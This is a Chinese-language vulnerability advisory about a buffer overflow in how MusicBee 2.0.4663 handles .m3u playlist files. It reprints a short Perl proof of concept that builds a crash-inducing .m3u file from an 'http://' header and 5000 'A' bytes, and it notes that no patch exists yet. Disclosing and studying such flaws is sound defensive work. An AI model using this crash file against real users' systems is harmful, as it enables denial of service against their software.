MusicBee '.m3u'文件远程缓冲区溢出漏洞

MusicBee '.m3u'文件远程缓冲区溢出漏洞

发布日期：2013-06-19
更新日期：2013-06-23

受影响系统：
MusicBee MusicBee 2.0.4663
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 60689
 
MusicBee是音乐管理收藏管理软件。
 
MusicBee 2.0.4663没有正确检查用户数据，在实现上存在缓冲区溢出漏洞。攻击者可利用此漏洞在受影响应用上下文中执行任意代码。
 
<*来源：Chako
 
  链接：http://www.exploit-db.com/exploits/26322/
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
#!/usr/bin/perl
 #
 #
 #
 #############################################################
 #
 # Exploit Title: MusicBee v2.0.4663 .M3U Denial of Service Exploit
# Date: 2013/6/19
# Exploit Author: Chako
# Vendor Homepage: http://getmusicbee.com/
 # Version: v2.0.4663
 # Tested on: Windows XP SP3 English
 #############################################################
 
$HEADER = "http://";
 #$BOF    = "\x41" x 3740;
 $BOF    = "\x41" x 5000;
 

open(myfile, '> MusicBee _EXP.m3u');
 print myfile $HEADER.$BOF;

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
MusicBee
 --------
 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
 
http://getmusicbee.com/